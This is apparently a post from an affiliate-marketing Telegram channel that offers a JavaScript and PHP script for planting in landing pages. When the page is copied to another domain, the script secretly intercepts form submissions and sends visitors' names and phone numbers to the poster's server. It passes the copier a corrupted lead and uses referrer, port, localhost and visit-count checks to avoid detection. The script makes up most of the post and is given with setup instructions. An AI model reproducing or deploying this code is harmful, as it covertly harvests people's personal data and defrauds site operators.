Hello all! Today, I will share my solution with you. It’s a pre-landing/landing page script that steals leads if your landing/pre-landing page was copied.
You’re welcome to subscribe to the https://t.me/deepcpa channel!
What does it do?
- There are several verification procedures so that it only works when a real person logs in (it checks the protocol, port, referrer, visits count, and whether the domain is real or fake).
- You can adjust the % of stolen leads (from 1% to 100%).
- It won’t work on your domain.
- Processes all forms.
- It sends the victim, that is, the one who copied your landing/pre-landing page, the same lead, only with one digit replaced in the phone number.
- You’ll find comments to the script, so it’s easy to figure out.
It’s up to you to integrate it the way you want to.
Here’s the script. You must add it to the landing/pre-landing page, but make sure that you input the name and number with correct attributes: name=”name” and name=”phone”
// specify the % of script triggers hereconst prc = 100//specify the path to the php evaluator fileconst url = 'evaluator URL here'//specify the pre-landing/landing page domainconst originalHost = `your domain without https:// and /`const checkedHost = window.location.hostconst fullUrl = window.location.href//run scriptstart()function start() { let userChek = checkUser() //check user verification if (!userChek) return let random = isRandom() //check whether the specified % is correct if (random) stealer()}function stealer() { //check if the landing page was stolen if (checkedHost == originalHost) return let forms = document.querySelectorAll('form') forms.forEach(element => { element.addEventListener('submit', (e) => { e.preventDefault() let name = e.target.querySelector('[name="name"]').value let phone = e.target.querySelector('[name="phone"]').value //generate the data to transfer let data = { host: fullUrl, name: name, phone: phone } //send a request sendData(data) .then(res => { //create a copy of the form and change the last digit, then send it var dupForm = e.target.cloneNode(true); dupForm.querySelector('[name="phone"]').value = `${phone.slice(0, -1)}${Math.floor(Math.random() * 9)}` dupForm.style.display = 'none' let body = document.querySelector('body') body.append(dupForm) dupForm.submit(); }) }) });}function isRandom() { let rnd = Math.floor(Math.random() * 101) if (rnd <= prc) return true return false}function checkUser() { // // the maximum visits count to trigger the script const AvalibleEntry = 2 let protocol = window.location.protocol let port = window.location.port let host = window.location.host let reffer = document.referrer let status = false //check whether the user logged in from http or https if (protocol == 'http:' || protocol == 'https:') status = true if (!status) return false //check user’s port if (port != '') return false //check if it runs on server if (host.includes('localhost') || host.includes('127.0.0.1')) return false //check referrer if (reffer == '') return false //determine the user visits count let userCount = localStorage.getItem('count') //restrict if more than two if (userCount >= AvalibleEntry) return false //if less, then determine the current value and add + 1 userCount == null ? localStorage.setItem('count', 1) : localStorage.setItem('count', +userCount + 1) return true}function sendData(propse) { return fetch(url, { method: 'post', body: JSON.stringify(propse) }) .then(response => response.json()) .then(json => (json)) .then(res => { this.data = res return res })}
The evaluator script only receives data with the lead number, name, and host. Then, you can use it as you please: you can either send it to the AP or to the Telegram.
<?php
header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: GET, POST');
header("Access-Control-Allow-Headers: *");
$payload = file_get_contents('php://input');
$payload = json_decode($payload, true);
$phone = $payload['phone'];
$name = $payload['name'];
$url = $payload['host'];
?>
- You’re welcome to contact us via Telegram in case you require any support!
- Our shop!
